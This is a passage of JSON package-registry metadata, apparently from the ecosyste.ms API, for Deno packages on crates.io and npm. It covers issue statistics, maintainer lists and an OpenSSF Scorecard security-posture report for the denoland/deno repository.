s/usage/cargo/thousand_birds_deno","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/thousand_birds_deno/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/thousand_birds_deno/codemeta","maintainers":[{"uuid":"222500","login":"kvey","name":"Colton Pierson","email":null,"url":"https://github.com/kvey","packages_count":24,"html_url":"https://crates.io/users/kvey","role":null,"created_at":"2024-10-09T05:51:42.097Z","updated_at":"2024-10-09T05:51:42.097Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/kvey/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":11161875,"name":"@deno/win32-arm64","ecosystem":"npm","description":"win32-arm64 distribution of Deno","homepage":"https://deno.land","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":"deno","versions_count":96,"first_release_published_at":"2024-12-12T21:24:01.860Z","latest_release_published_at":"2026-08-27T17:35:42.099Z","latest_release_number":"2.9.6","last_synced_at":"2026-08-29T21:57:00.996Z","created_at":"2024-12-12T22:00:15.515Z","updated_at":"2026-08-29T21:57:00.996Z","registry_url":"https://www.npmjs.com/package/@deno/win32-arm64","install_command":"npm install @deno/win32-arm64","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"lts":"2.2.15","latest":"2.9.6"},"contentPolicy":null},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36827962,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"ssl_error","status_checked_at":"2026-08-22T15:14:58.237Z","response_time":51,"last_error":"SSL_read: unexpected eof while 